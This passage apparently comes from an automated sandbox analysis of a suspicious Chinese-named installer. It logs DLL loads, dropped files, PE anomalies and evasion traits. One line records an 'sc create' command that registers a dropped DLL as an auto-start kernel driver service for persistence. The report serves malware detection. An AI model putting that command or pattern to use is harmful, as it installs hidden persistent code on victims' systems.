Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: apphelp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Window found: window name: TMainForm
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe Static file information: File size 5707631 > 1048576
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.2140314078.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2140505560.0000000001240000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B757D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 10_2_00B757D0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe Static PE information: real checksum: 0x0 should be: 0x57286f
Source: update.vac.6.dr Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: update.vac.2.dr Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.5.dr Static PE information: real checksum: 0x0 should be: 0x343a15
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr Static PE information: real checksum: 0x0 should be: 0x343a15
Source: hrsw.vbc.6.dr Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: tProtect.dll.12.dr Static PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe Static PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr Static PE information: section name: .didata
Source: update.vac.2.dr Static PE information: section name: .00cfg
Source: update.vac.2.dr Static PE information: section name: .voltbl
Source: update.vac.2.dr Static PE information: section name: .=~
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.5.dr Static PE information: section name: .didata
Source: 7zr.exe.6.dr Static PE information: section name: .sxdata
Source: is-0F5J3.tmp.6.dr Static PE information: section name: .xdata
Source: hrsw.vbc.6.dr Static PE information: section name: .00cfg
Source: hrsw.vbc.6.dr Static PE information: section name: .voltbl
Source: hrsw.vbc.6.dr Static PE information: section name: .=~
Source: update.vac.6.dr Static PE information: section name: .00cfg
Source: update.vac.6.dr Static PE information: section name: .voltbl
Source: update.vac.6.dr Static PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA286EB push ecx; ret 6_2_6CA286FE
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6C8D0F00 push ss; retn 0001h 6_2_6C8D0F0A
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAF6F10 push eax; ret 6_2_6CAF6F2E
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA5B9F4 push 004AC35Ch; ret 6_2_6CA5BA0E
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAF7290 push eax; ret 6_2_6CAF72BE
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AF45F4 push 00B9C35Ch; ret 10_2_00AF460E
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B8FB10 push eax; ret 10_2_00B8FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B8FE90 push eax; ret 10_2_00B8FEBE
Source: update.vac.2.dr Static PE information: section name: .=~ entropy: 7.19316283520878
Source: hrsw.vbc.6.dr Static PE information: section name: .=~ entropy: 7.19316283520878
Source: update.vac.6.dr Static PE information: section name: .=~ entropy: 7.19316283520878
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp File created: C:\Users\user\AppData\Local\Temp\is-R46SO.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp File created: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp File created: C:\Program Files (x86)\Windows NT\trash (copy)
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp File created: C:\Users\user\AppData\Local\Temp\is-V2E3L.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp File created: C:\Users\user\AppData\Local\Temp\is-R46SO.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe File created: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe File created: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe File created: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp File created: C:\Program Files (x86)\Windows NT\is-0F5J3.tmp
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp File created: C:\Users\user\AppData\Local\Temp\is-V2E3L.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp File created: C:\Program Files (x86)\Windows NT\7zr.exe
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp File created: C:\Users\user\AppData\Local\Temp\is-R46SO.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp File created: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp File created: C:\Users\user\AppData\Local\Temp\is-V2E3L.tmp\update.vac
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (10 occurrences)

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp System information queried: FirmwareTableInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6310
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3336
